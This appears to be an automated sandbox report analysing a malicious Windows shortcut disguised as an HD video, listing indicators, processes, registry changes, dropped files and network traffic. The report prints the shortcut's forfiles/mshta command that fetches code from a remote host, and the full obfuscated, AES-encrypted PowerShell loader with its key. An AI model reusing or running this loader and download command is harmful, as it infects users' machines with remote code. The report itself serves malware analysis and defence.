| download: | /Downloads/Full%20Video%20HD%20(1080p).lnk |
| Full analysis: | https://app.any.run/tasks/f9429905-de21-46d8-afcc-05dc540e6ad8 |
| Verdict: | Malicious activity |
| Analysis date: | June 10, 2024, 15:00:42 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=115, Archive, ctime=Sat May 8 08:13:59 2021, mtime=Sat May 8 08:13:59 2021, atime=Sat May 8 08:13:59 2021, length=41472, window=hidenormalshowminimized |
| MD5: | 62F20122A70C0F86A98FF14E84BCC999 |
| SHA1: | 7E1A5DB6E9C56EC3CD462DCB872A904AA77456F6 |
| SHA256: | E3BF61F6F96D1A121A1F7F47188CD36FC51F4565CA8CD8FC07207E56A038E7CA |
| SSDEEP: | 24:8NdlbXZsx3n2NpEZpyA3Pkw+/4P+0F6xZdpEQI7ldsWO:8Dlwj7Z+diQqsWO |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 2312)
Drops the executable file immediately after the start
- mshta.exe (PID: 4080)
- powershell.exe (PID: 2312)
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 4080)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 2312)
Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
- powershell.exe (PID: 2312)
Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
- powershell.exe (PID: 2312)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 2312)
Dynamically loads an assembly (POWERSHELL)
- powershell.exe (PID: 2312)
SUSPICIOUS
Starts POWERSHELL.EXE for commands execution
- forfiles.exe (PID: 3984)
- mshta.exe (PID: 4080)
Searches and executes a command on selected files
- forfiles.exe (PID: 3984)
Reads the Internet Settings
- mshta.exe (PID: 4080)
- powershell.exe (PID: 2312)
Executable content was dropped or overwritten
- mshta.exe (PID: 4080)
- powershell.exe (PID: 2312)
Process drops legitimate windows executable
- mshta.exe (PID: 4080)
- powershell.exe (PID: 2312)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 4080)
Probably obfuscated PowerShell command line is found
- mshta.exe (PID: 4080)
Cryptography encrypted command line is found
- powershell.exe (PID: 2312)
Adds/modifies Windows certificates
- mshta.exe (PID: 4080)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 2312)
Extracts files to a directory (POWERSHELL)
- powershell.exe (PID: 2312)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 2312)
Gets file extension (POWERSHELL)
- powershell.exe (PID: 2312)
The process creates files with name similar to system file names
- powershell.exe (PID: 2312)
The process drops C-runtime libraries
- powershell.exe (PID: 2312)
Base64-obfuscated command line is found
- mshta.exe (PID: 4080)
INFO
Reads security settings of Internet Explorer
- powershell.exe (PID: 4008)
Create files in a temporary directory
- powershell.exe (PID: 4008)
Reads Internet Explorer settings
- mshta.exe (PID: 4080)
- powershell.exe (PID: 2312)
Checks proxy server information
- mshta.exe (PID: 4080)
Manual execution by a user
- wmpnscfg.exe (PID: 312)
Checks supported languages
- wmpnscfg.exe (PID: 312)
- vlc.exe (PID: 1616)
Gets data length (POWERSHELL)
- powershell.exe (PID: 2312)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 2312)
- powershell.exe (PID: 2312)
Disables trace logs
- powershell.exe (PID: 2312)
Reads the computer name
- vlc.exe (PID: 1616)
- wmpnscfg.exe (PID: 312)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2021:05:08 08:13:59+00:00 |
| AccessDate: | 2021:05:08 08:13:59+00:00 |
| ModifyDate: | 2021:05:08 08:13:59+00:00 |
| TargetFileSize: | 41472 |
| IconIndex: | 115 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | forfiles.exe |
| DriveType: | Fixed Disk |
| VolumeLabel: | - |
| LocalBasePath: | C:\Windows\System32\forfiles.exe |
| Description: | powershell |
| RelativePath: | ..\..\..\Windows\System32\forfiles.exe |
| CommandLineArguments: | /p C:\Windows /m win.ini /c "powershell . mshta https://nextomax.b-cdn.net/nexto" |
| IconFileName: | shell32.dll |
| MachineID: | win-pm8mrnsteel |
Total processes
41
Monitored processes
6
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 312 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1616 | "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Roaming\video.mp4" | C:\Program Files\VideoLAN\VLC\vlc.exe | powershell.exe | ||||||||||||
User: admin Company: VideoLAN Integrity Level: MEDIUM Description: VLC media player Version: 3.0.11 Modules
| |||||||||||||||
| 2312 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ffQiHkvB($LpAs){return -split ($LpAs -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$xMaLNwL = ffQiHkvB('2319245FD48C66D76FC89F9C99D5E857EB6F754A01719C2716960A67C272DE45298052669A3E7FDC354527F866D0CFB427707F187F003975C7BD6FE92D63A5C8CF57FC00BD2FAB405E15590D6BA6A78AF390557942B9FA866633F0F0F086903D60D789C62F1F60A2E9E7944845574961467035A1872499668FF1C71CDE0472855CB43C4B1B50BA18A14A2BEDC171B28ABB9ED106DF460A48934714F1692E1AE13B7652628D6598258517847BA727975C949CF2CC5A18D84D8772E985B3AAA13C88A0E28D6E8FFB565E0EDF340A2E6A539A6DE3C2CCDF8CE6CEDF31568465D2A5F7FBD7930D4587E7DA04D446421FED37BB3052B408A75465E83FD1B9C008BA65644187C96548BD9DF458F6E7E2FC04C3E357B8CE677E487E749592A855A466C15EAC9B6644A922495D538FA114AB6DA91D8546279ED9A3CE250D6C4FF6E684538927E842F5F01B4D96FABE6274B7006CD2829E8017CB1AAD330F61E14C6EC6C8A18A6D1F75389E371E7406B98E0DC4D605521925ECD1C2A38D07EBC8F2034237B0F2FBDD7D4C94B37374A7463EC34E73D478CA5DF801FC68CFF4BD491B28F31FBC2E0FD6A84A99E7991CD42703ADA402D2308819AB67B94D2B8F874EABC1A6F11A189DA68436F126B3350004BAFDA880CAED72DAF6DC38AC32706BA153E15859AB8512ACADAE1B30E0CCB37D4294E2FCC7A1CECC731812ABE057EE85658868B65A7C15152A6EE8B1E36633BAF4571086A0D40CD7EA788456AB9A9EAFD4E7A7810C8C9C218685509AB36DB3D481F7450CDE3A323483B69A94489FE4DD8AB096A883AF5D168697370D5C0A1B13B9407AA6F0046F96C407A4EA117B862F9F03FEC18438F40110B925819A21FBBBB5E7AAA37CD370F685A86DA53FF272201E5FCD9BC95996E9E87F866D3007802915916A32AA349068C7746DE6579697F716166A132B0488632B0BA94F03D65155D3A0BFCE221D3F75BE68C17180F7A3C26ED6CB9F26E923177AAFF728E1DF5104EAB605B0B555EE458D0583466F509CD00923913AD5767BF84A3694665506246D9A08BE349EF210221F157F053F80D5E1DD2ECE618FC8DA8795E3EC9904FEB09ED7FF8C224EDD63251EDA820E3243BFAB90DC41D39352F238DFA271DBC7A3A5D2876B50E12703442208D7655E8721CC377E385AA1002D858BD6BF2A87A1BBEC475121F99E2F57A4AA916BAE443C564268A41B348BBFF8D4EBC66FC759097E1306FBCDF0E972ACA57F9D6A398F258BCEDE42851B67C7C8A8F185AD2A7B9CCFDF1E918240DD85CF7F9116D51360F5CB7C45DE3E594DC323C64A8967BFABFDAEAD7BA8FA9131A0A3BAD3E7F53C877D40EAC07F2A07F64E637905948B2C623FD27D30D7D36C6147923A4B0B2771B600E6BAF286C77E35B8E0CFAF2A5C749483C5466AAE58CADD1C4B1BA97EEB6123EAFCE0B9ED763EBB389DC459783C122CBBE5EB3B061C34A2179CDFBEBABB948ACE4869D964CA8F86D1E02AB80D6C86A9EF293AFBE9D352D1214BA3FBBFC915961F17B30DBFC28F4CF9BC2C0469499DA62A83CE749E90A15691818EE0D8B1E1231908E9219186F0AF02BC5C61D5E711C7065384B83F6022A53766F5B43CDD979C875CA37D6A781F620952CD11EBC53863D5DEBEF9604AF1EFFC3AACFF0AC608ECFF64E4021FE7DD9D31829123E79A8AB162F13C0F0FAFE7CFD01E5A65DC3DA655C44C5318ED09185EAC87AB00D2E66272B58821AC9AFE24A7904EF459D9E19C0015C277A2768911D178697222CAC6D6C0A8E49EF58D48853CDD4273221EF8B0FEDC2F388A84FF9D938799C2123938A9E200FD6F4D22BB26C989985A78C8D9BE9FEBA5F73C381913C4550892B3F6B23B59C08D98D1B87FDA46BC38865DBF4029AC1D8EDD25E0F37C644FCB62656D65F57C29DEBF627C6BB67E3473AFD4A2BE78076E94AE0453338A2D04FE5B7C49662D660176048591431C9CE4611C8F70385B8B7591B572B4E6D8F6A9AFC4513B43CC38CF38781F566BD1473F1DD240D2A8B1D1B82590D5D97109C9D0C0E8D1EEE399562243F48F2840819EC7086FE9FB41123CD0E5E3917246D51CA4164E4446CDE7F13F985A52F9D5358B6DBC16E40AB4CE5C26C6679BC174A06DAD8C0E299EEE9D3C2A61F074E738504884181E13DCE8EB286EB65BF01E477ACE2864809ADC0FBBDFA65919CFF64410ED6565464A09C3635B5AD35710F758EF865B9C5B2B900F7DF3C83E65EB26F128F9D4F9D7E6942F5C47AD5ACE6265EF271302F269BB7D1B2A4677A935B6958BD06F868D5F0F9C0F8AA3883FC054CB3A3D17D8530126BCB2804CC8A030998F6C12FDEE463436379FDD4284C96C4E80209C9BB564A12F593FBE0E501EB55D8863E35BB050DDC710C110C96CB30BA6F24A7B17BF205017867E887CA9FE5AB9E2BC90128390DC848036EECCFF2AB22E10597C981C0F5AD1C3A0B5DD1A6ED70EF9A4146B76F73A438154A7B0BE8E644FD4E788E009B5CEA4B49A450DF1630B420C87557CC68D2700C44E1663785DADB01545EEB967DAAC4A58A4A7B302FF93413051157B912F737AE3612E74994EA740990F2926');$OIOVH = [System.Security.Cryptography.Aes]::Create();$OIOVH.Key = ffQiHkvB('746A53774B6D6F6F7569476B7041676D');$OIOVH.IV = New-Object byte[] 16;$zSGjOrGR = $OIOVH.CreateDecryptor();$tQOhULjbC = $zSGjOrGR.TransformFinalBlock($xMaLNwL, 0, $xMaLNwL.Length);$FOxZZBmey = [System.Text.Encoding]::Utf8.GetString($tQOhULjbC);$zSGjOrGR.Dispose();& $FOxZZBmey.Substring(0,3) $FOxZZBmey.Substring(3) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3984 | "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://nextomax.b-cdn.net/nexto" | C:\Windows\System32\forfiles.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ForFiles - Executes a command on selected files Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 4008 | . mshta https://nextomax.b-cdn.net/nexto | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | forfiles.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 4080 | "C:\Windows\system32\mshta.exe" https://nextomax.b-cdn.net/nexto | C:\Windows\System32\mshta.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
Total events
24 175
Read events
24 067
Write events
74
Delete events
34
Modification events
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | ProxyServer |
Value: | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | ProxyOverride |
Value: | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | AutoConfigURL |
Value: | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | AutoDetect |
Value: | |||
| (PID) Process: | (4080) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 460000005D010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
Executable files
127
Suspicious files
25
Text files
5
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2312 | powershell.exe | C:\Users\admin\AppData\Local\Temp\qxeq0zia.4pq.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 4008 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
| 2312 | powershell.exe | C:\Users\admin\AppData\Roaming\video.mp4 | binary | |
MD5:91423DD4F34F759AAF82AA73FA202120 | SHA256:D9158D0FD577687321A7B29C5DF3712A44E7AA13F03207A158147E9E4B253B53 | |||
| 2312 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab69A9.tmp | compressed | |
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5 | SHA256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F | |||
| 4080 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\517B86ABD897C7B2D4ECD67EE3885B86 | binary | |
MD5:CB3E9D8D3FDFBB0E89CC809C50948E89 | SHA256:D3D00D5B5688FF92355396BEC96862AAB0F3EC4A74C740D9A0ECBD7E7F998480 | |||
| 4080 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D | binary | |
MD5:C4910EFDD7B1C21EC4609775BADBCD6D | SHA256:8326E1BE2D5130A9974C050FF7D354CF4E1CC2C1348167F46F4793C6AF8D9383 | |||
| 2312 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5 | SHA256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F | |||
| 4080 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\nexto[1] | executable | |
MD5:75B0A8C673D0A0BDF8DB20690B3C5933 | SHA256:FD7654C5BB79652BC0DB2696DA35497B9AFF2C783EC4C83705D33D329DC742D8 | |||
| 4080 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E | binary | |
MD5:A8140E1FC6E9419AFECB040A049D4073 | SHA256:981DC32C401429D176CEF39A9F39AE0D262DFA0509965A1E555193D97BBB92AD | |||
| 1616 | vlc.exe | C:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.ini.Hp1616 | ini | |
MD5:B9DC945AE9ABAC7EE2F595C463A6A1CD | SHA256:99DA9FF89BFD6DBC06DEAD61DE5AF878B311AB367262F19EAE64DDD27ED935AF | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
12
DNS requests
9
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4080 | mshta.exe | GET | 304 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?5b82c075ae5b2086 | unknown | — | — | unknown |
4080 | mshta.exe | GET | 200 | 172.64.149.23:80 | http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D | unknown | — | — | unknown |
4080 | mshta.exe | GET | 200 | 104.18.38.233:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D | unknown | — | — | unknown |
4080 | mshta.exe | GET | 200 | 172.64.149.23:80 | http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQCb80pEPlZ04x2fAu4YLy1O | unknown | — | — | unknown |
1088 | svchost.exe | GET | 304 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?91e4205cfb4a00a1 | unknown | — | — | unknown |
2312 | powershell.exe | GET | 200 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4bb8e789d886b072 | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4080 | mshta.exe | 138.199.37.231:443 | nextomax.b-cdn.net | Datacamp Limited | DE | unknown |
4080 | mshta.exe | 199.232.214.172:80 | ctldl.windowsupdate.com | FASTLY | US | unknown |
4080 | mshta.exe | 172.64.149.23:80 | ocsp.comodoca.com | CLOUDFLARENET | US | unknown |
4080 | mshta.exe | 104.18.38.233:80 | ocsp.comodoca.com | CLOUDFLARENET | — | shared |
2312 | powershell.exe | 138.199.37.231:443 | nextomax.b-cdn.net | Datacamp Limited | DE | unknown |
2312 | powershell.exe | 188.114.96.3:443 | forikabrof.click | CLOUDFLARENET | NL | unknown |
2312 | powershell.exe | 199.232.214.172:80 | ctldl.windowsupdate.com | FASTLY | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
nextomax.b-cdn.net |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.comodoca.com |
| whitelisted |
ocsp.usertrust.com |
| whitelisted |
ocsp.sectigo.com |
| whitelisted |
forikabrof.click |
| unknown |
Threats
Process | Message |
|---|---|
vlc.exe | main libvlc debug: configured with ../extras/package/win32/../../../configure '--enable-update-check' '--enable-lua' '--enable-faad' '--enable-flac' '--enable-theora' '--enable-avcodec' '--enable-merge-ffmpeg' '--enable-dca' '--enable-mpc' '--enable-libass' '--enable-schroedinger' '--enable-realrtsp' '--enable-live555' '--enable-dvdread' '--enable-shout' '--enable-goom' '--enable-caca' '--enable-qt' '--enable-skins2' '--enable-sse' '--enable-mmx' '--enable-libcddb' '--enable-zvbi' '--disable-telx' '--enable-nls' '--host=i686-w64-mingw32' '--with-breakpad=https://win.crashes.videolan.org' 'host_alias=i686-w64-mingw32' 'PKG_CONFIG_LIBDIR=/home/jenkins/workspace/vlc-release/windows/vlc-release-win32-x86/contrib/i686-w64-mingw32/lib/pkgconfig'
|
vlc.exe | main libvlc debug: min period: 1 ms, max period: 1000000 ms
|
vlc.exe | main libvlc debug: Copyright © 1996-2020 the VideoLAN team
|
vlc.exe | main libvlc debug: VLC media player - 3.0.11 Vetinari
|
vlc.exe | main libvlc debug: revision 3.0.11-0-gdc0c5ced72
|
vlc.exe | main libvlc debug: using multimedia timers as clock source
|
vlc.exe | main libvlc debug: searching plug-in modules
|
vlc.exe | main libvlc debug: loading plugins cache file C:\Program Files\VideoLAN\VLC\plugins\plugins.dat
|
vlc.exe | main libvlc debug: recursively browsing `C:\Program Files\VideoLAN\VLC\plugins'
|
vlc.exe | main libvlc error: stale plugins cache: modified C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_concat_plugin.dll
|